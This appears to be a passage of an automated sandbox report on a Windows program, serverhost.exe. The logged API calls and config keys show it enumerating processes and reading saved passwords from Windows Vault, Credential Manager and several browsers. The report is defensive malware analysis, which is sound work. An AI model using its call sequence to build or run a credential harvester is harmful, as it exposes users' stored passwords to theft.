Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\sdclt.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\argentina conducting merchandise.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\lyrics-morning-effectiveness.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows defender\involved-int-antenna-lol.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\food_logos_lot.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows sidebar\designed.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft office\chargetrackbacksobserve.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\msbuild\info-began-nobody-tops.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\uninstall information\myers biggest qatar.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\google\invalid.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows nt\panel-maria-suggestion.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows mail\remained universe sole.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\internet explorer\evanescence oscar em.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\reference assemblies\fifth roller.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows sidebar\irish.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft analysis services\advocate-keep.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft office\distributors.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft.net\lighter.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows sidebar\lease-entitled-pcs.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows media player\nerve-bracelet.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft office\office15\winword.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Module (117)
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x6eb50000 True 1
Load shell32.dll base_address = 0x758a0000 True 1
Load advapi32.dll base_address = 0x764f0000 True 2
Load pstorec.dll base_address = 0x71ec0000 True 1
Load vaultcli.dll base_address = 0x6f4d0000 True 1
Load C:\Program Files\Mozilla Firefox\nss3.dll base_address = 0x63270000 True 1
Load psapi.dll base_address = 0x773f0000 True 1
Get Handle private_0x0000000000400000 base_address = 0x400000 True 22
Get Handle C:\Program Files\Mozilla Firefox\nss3.dll base_address = 0x0 False 1
Get Handle c:\program files\mozilla firefox\nss3.dll base_address = 0x63270000 True 2
Get Handle c:\windows\system32\kernel32.dll base_address = 0x76590000 True 1
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 2
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\taskhost.exe, file_name_orig = C:\Windows\system32\taskhost.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\dwm.exe, file_name_orig = C:\Windows\system32\Dwm.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\taskeng.exe, file_name_orig = C:\Windows\system32\taskeng.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\sdclt.exe, file_name_orig = C:\Program Files\Common Files\blowiranlaboratorydisaster.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\internet explorer\argentina conducting merchandise.exe, file_name_orig = C:\Program Files\Internet Explorer\argentina conducting merchandise.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\output.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\sc.exe, file_name_orig = C:\Program Files\Adobe\bookings.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\dvd maker\lyrics-morning-effectiveness.exe, file_name_orig = C:\Program Files\DVD Maker\lyrics-morning-effectiveness.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows defender\involved-int-antenna-lol.exe, file_name_orig = C:\Program Files\Windows Defender\involved-int-antenna-lol.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\conhost.exe, file_name_orig = C:\Program Files\Microsoft Office\enterprise monsters comments.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\dvd maker\food_logos_lot.exe, file_name_orig = C:\Program Files\DVD Maker\food_logos_lot.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows sidebar\designed.exe, file_name_orig = C:\Program Files\Windows Sidebar\designed.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft office\chargetrackbacksobserve.exe, file_name_orig = C:\Program Files\Microsoft Office\chargetrackbacksobserve.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\msbuild\info-began-nobody-tops.exe, file_name_orig = C:\Program Files\MSBuild\info-began-nobody-tops.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\uninstall information\myers biggest qatar.exe, file_name_orig = C:\Program Files\Uninstall Information\myers biggest qatar.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\google\invalid.exe, file_name_orig = C:\Program Files\Google\invalid.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows nt\panel-maria-suggestion.exe, file_name_orig = C:\Program Files\Windows NT\panel-maria-suggestion.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows mail\remained universe sole.exe, file_name_orig = C:\Program Files\Windows Mail\remained universe sole.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\internet explorer\evanescence oscar em.exe, file_name_orig = C:\Program Files\Internet Explorer\evanescence oscar em.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\reference assemblies\fifth roller.exe, file_name_orig = C:\Program Files\Reference Assemblies\fifth roller.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows sidebar\irish.exe, file_name_orig = C:\Program Files\Windows Sidebar\irish.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft analysis services\advocate-keep.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\advocate-keep.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft office\distributors.exe, file_name_orig = C:\Program Files\Microsoft Office\distributors.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft.net\lighter.exe, file_name_orig = C:\Program Files\Microsoft.NET\lighter.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows sidebar\lease-entitled-pcs.exe, file_name_orig = C:\Program Files\Windows Sidebar\lease-entitled-pcs.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows media player\nerve-bracelet.exe, file_name_orig = C:\Program Files\Windows Media Player\nerve-bracelet.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Office15\WINWORD.EXE, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x6eb56be6 True 1
Get Address c:\windows\system32\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x758c0468 True 1
Get Address c:\windows\system32\advapi32.dll function = CryptAcquireContextA, address_out = 0x764f91dd True 1
Get Address c:\windows\system32\advapi32.dll function = CryptReleaseContext, address_out = 0x764fe124 True 1
Get Address c:\windows\system32\advapi32.dll function = CryptCreateHash, address_out = 0x764fdf4e True 1
Get Address c:\windows\system32\advapi32.dll function = CryptGetHashParam, address_out = 0x764fdf7e True 1
Get Address c:\windows\system32\advapi32.dll function = CryptHashData, address_out = 0x764fdf36 True 1
Get Address c:\windows\system32\advapi32.dll function = CryptDestroyHash, address_out = 0x764fdf66 True 1
Get Address c:\windows\system32\advapi32.dll function = CredReadA, address_out = 0x765371c1 True 1
Get Address c:\windows\system32\advapi32.dll function = CredFree, address_out = 0x764fb2ec True 1
Get Address c:\windows\system32\advapi32.dll function = CredDeleteA, address_out = 0x76537941 True 1
Get Address c:\windows\system32\advapi32.dll function = CredEnumerateA, address_out = 0x76537381 True 1
Get Address c:\windows\system32\advapi32.dll function = CredEnumerateW, address_out = 0x76537481 True 1
Get Address c:\windows\system32\pstorec.dll function = PStoreCreateInstance, address_out = 0x71ec526c True 1
Get Address c:\windows\system32\vaultcli.dll function = VaultOpenVault, address_out = 0x6f4d26a9 True 1
Get Address c:\windows\system32\vaultcli.dll function = VaultCloseVault, address_out = 0x6f4d2718 True 1
Get Address c:\windows\system32\vaultcli.dll function = VaultEnumerateItems, address_out = 0x6f4d3099 True 1
Get Address c:\windows\system32\vaultcli.dll function = VaultFree, address_out = 0x6f4d4321 True 1
Get Address c:\windows\system32\vaultcli.dll function = VaultGetInformation, address_out = 0x6f4d24c0 True 1
Get Address c:\windows\system32\vaultcli.dll function = VaultGetItem, address_out = 0x6f4d3242 True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = NSS_Init, address_out = 0x6332d70b True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = NSS_Shutdown, address_out = 0x6332d13c True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x632c3c51 True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_FreeSlot, address_out = 0x632c3333 True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_CheckUserPassword, address_out = 0x632acbc4 True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_Authenticate, address_out = 0x632ad3ca True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11SDR_Decrypt, address_out = 0x632c00a7 True 2
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_open, address_out = 0x633d1ca0 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_prepare, address_out = 0x6335ce70 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_step, address_out = 0x633c5200 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_column_text, address_out = 0x6337d400 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_column_int, address_out = 0x6337d3a0 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_column_int64, address_out = 0x6337d3d0 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_finalize, address_out = 0x633a9f60 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_close, address_out = 0x633abde0 True 1
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_exec, address_out = 0x633aa270 True 1
Get Address c:\windows\system32\psapi.dll function = GetModuleBaseNameW, address_out = 0x773f152c True 1
Get Address c:\windows\system32\psapi.dll function = EnumProcessModules, address_out = 0x773f1408 True 1
Get Address c:\windows\system32\psapi.dll function = GetModuleFileNameExW, address_out = 0x773f13f0 True 1
Get Address c:\windows\system32\psapi.dll function = EnumProcesses, address_out = 0x773f1544 True 1
Get Address c:\windows\system32\psapi.dll function = GetModuleInformation, address_out = 0x773f1420 True 1
Get Address c:\windows\system32\kernel32.dll function = GetProcessTimes, address_out = 0x765cf626 True 1
System (3)
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 2
Get Info type = Hardware Information True 1
Ini (28)
Operation Filename Additional Information Success Count Logfile
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = FirefoxProfileFolder False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = FirefoxInstallFolder False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ChromeProfileFolder False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = OperaPasswordFile False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = WinPos False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = Columns False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = Path, data_out = Profiles/zp0p8bce.default True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = Path False 1
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Process #15: serverhost.exe
(Host: 40, Network: 0)
Information Value
ID #15
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:47, Reason: Autostart
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:00:38
OS Process Information
Information Value
PID 0x744
Parent PID 0x600 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000ecd9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x748
0x784
0x7B0
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x00177fff Pagefile Backed Memory Readable True False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00196fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x001d0000 0x001d0fff Memory Mapped File Readable False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable True False False
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True False False
pagefile_0x00000000002f0000 0x002f0000 0x003f0fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00400000 0x0045bfff Memory Mapped File Readable False False False
rpcss.dll 0x00400000 0x0045bfff Memory Mapped File Readable False False False
pagefile_0x0000000000400000 0x00400000 0x00400fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x00410000 0x00413fff Memory Mapped File Readable True False False
private_0x0000000000410000 0x00410000 0x00418fff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00420000 0x0043cfff Memory Mapped File Readable True False False
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000450000 0x00450000 0x00473fff Private Memory Readable, Writable True False False
private_0x0000000000450000 0x00450000 0x00461fff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x00481fff Private Memory Readable, Writable True False False
private_0x0000000000480000 0x00480000 0x00488fff Private Memory Readable, Writable True False False
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory Readable, Writable True False False
private_0x0000000000590000 0x00590000 0x005b3fff Private Memory Readable, Writable True False False
private_0x0000000000590000 0x00590000 0x005a1fff Private Memory Readable, Writable True False False
private_0x00000000005b0000 0x005b0000 0x005bcfff Private Memory Readable, Writable True False False
private_0x00000000005d0000 0x005d0000 0x006cffff Private Memory Readable, Writable True False False
private_0x00000000006d0000 0x006d0000 0x00717fff Private Memory Readable, Writable True False False
private_0x0000000000720000 0x00720000 0x0072ffff Private Memory Readable, Writable True False False
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable True False False
private_0x0000000000760000 0x00760000 0x008affff Private Memory Readable, Writable True False False
pagefile_0x0000000000760000 0x00760000 0x0083efff Pagefile Backed Memory Readable True False False
private_0x0000000000870000 0x00870000 0x008affff Private Memory Readable, Writable True False False
private_0x00000000008b0000 0x008b0000 0x009affff Private Memory Readable, Writable True False False
serverhost.exe 0x009e0000 0x009fafff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000a00000 0x00a00000 0x015fffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001600000 0x01600000 0x019f2fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01a00000 0x01ccefff Memory Mapped File Readable False False False
private_0x0000000001cd0000 0x01cd0000 0x01d17fff Private Memory Readable, Writable True False False
private_0x0000000001e30000 0x01e30000 0x01f2ffff Private Memory Readable, Writable True False False
imageres.dll 0x6d1b0000 0x6e505fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x711a0000 0x711ebfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x71b80000 0x71c03fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x71c90000 0x72fe5fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x73790000 0x737b0fff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x73a40000 0x73b3afff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x73ea0000 0x73edffff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x73ee0000 0x73fd4fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74020000 0x741bdfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74f70000 0x74f8afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74f90000 0x74f9bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75040000 0x7504afff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x75150000 0x75161fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x751a0000 0x751e9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x75310000 0x75336fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x75340000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x753e0000 0x7546efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x754a0000 0x754e4fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x754f0000 0x75590fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x756a0000 0x7573cfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75740000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76390000 0x7645bfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76500000 0x765d3fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x767e0000 0x767fefff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76800000 0x7695bfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x76970000 0x769f2fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76bc0000 0x76bc9fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76bd0000 0x76c98fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76ca0000 0x76e3cfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76e40000 0x76eebfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76ef0000 0x7702bfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x77030000 0x77048fff Memory Mapped File Readable, Writable, Executable False False False
